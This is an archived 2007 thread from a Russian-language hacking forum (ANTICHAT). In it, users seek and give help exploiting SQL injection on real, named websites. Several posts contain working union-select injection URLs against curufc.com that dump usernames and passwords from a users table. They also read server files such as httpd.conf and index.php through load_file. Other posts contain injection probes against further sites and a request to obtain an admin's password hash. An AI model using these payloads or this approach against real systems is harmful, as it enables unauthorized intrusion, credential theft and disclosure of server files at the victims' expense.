ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.11.2007, 22:27
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Mike 007
www.purecoolness.com
Помогите разобраться, вот ссылка на SQL инъекцию
http://www.purecoolness.com/search.php?action=results&sid=3881&sortby=1'&order =
http://www.purecoolness.com/forumdisplay.php?sortby=1&order=1&datecut=1'
http://www.purecoolness.com/search.php?action=1'&uid=94
http://www.purecoolness.com/member.php?action=1'
http://www.purecoolness.com/editpost.php?pid=1'
Вообщем там такого мнооооого =)
Только я не знаю что с этим делать =(
Что деать дальше? Как узнать хеш\пароль админа?
Где ты там увидел иньекцию? Ну на хрена чужое врямя тратить?! Теперь я понимаю почиму у тебя -20 стоит...
__________________
Кто я?..
|
|
|
14.11.2007, 22:46
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
I-I()/Ib
панятно, а почему ошибка получается?
|
|
|
|
15.11.2007, 15:20
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Сообщение от Mike 007
I-I()/Ib
панятно, а почему ошибка получается?
Ткни мне не умному на ошибку...
Сообщение от 5taY3r
Чем можно расшифровать пароль такого вида:
Fl9fXPUerGzG
ПассвордПро не берёт, словарей наверное мало...)
Это смотря окуда ты этот пароль взял... Скорее всего какой то свой алгоритм имхо...
__________________
Кто я?..
|
|
|
|
15.11.2007, 15:22
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Это смотря окуда ты этот пароль взял... Скорее всего какой то свой алгоритм имхо...
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*
|
|
|
|
15.11.2007, 18:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от 5taY3r
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ ws(0x05,id,username,password),0x72),0x72),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32+from+users+limit+1,1/*
да скорее всего самописный какойто (оч похоже на base64, но это не просто base64 а что то еще, хотя хз), читай скрипты, ищи где это осуществляется:
вот тебе httpd.conf
Код:
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/usr/local/apache/conf/httpd.conf'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
вот тебе index.php
Код:
http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/home/vhost/curufc.com/html/index.php'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
вобщем ковыряй, если это действительно нужно
__________________
Карфаген должен быть разрушен...
|
|
|
|
15.11.2007, 14:58
|
|
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576
Репутация:
100
|
|
Чем можно расшифровать пароль такого вида:
Fl9fXPUerGzG
ПассвордПро не берёт, словарей наверное мало...)
|
|
|
|
20.11.2007, 03:21
|
|
Новичок
Регистрация: 18.09.2007
Сообщений: 3
Провел на форуме:
14301
Репутация:
1
|
|
помогите доработать скулю, если ето возможно
http://www.kauma.ru/showpicture.php?image=-3+union+select+1,2,3,4,5,6,7,8,9,1/*
Последний раз редактировалось xploited; 20.11.2007 в 04:11..
|
|
|
|
20.11.2007, 08:39
|
|
Познающий
Регистрация: 06.09.2006
Сообщений: 94
Провел на форуме:
397064
Репутация:
15
|
|
Так, сюда вроде задают вопросы, вот и я задам, надеюсь не будет оффтопом.
Нашел сайт. Делал Sql и получал вот такую страницу при запросе =1'
Скрин номер раз
Ну в принципе все стандартно, тока почему то на отдельной странице.
Но если сделать кривой запрос, например: ='-1 то получаем вообще вот такое:
скрин номер два
Скажите что за баг, и можно ли его испльзовать? Есть ли полезность?
Заранее спасибо... |
|
|
|
20.11.2007, 12:45
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2Twiddle обычная sql-inj, скорей всего можно исползовать, ну и значит определеннные даннные ты наверное сможешь получить
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.11.2007, 23:36
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Скажите народ, вот если сайтик на одних html' ках построен, то есть без скриптов всяких, получается и зацепится не за что?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид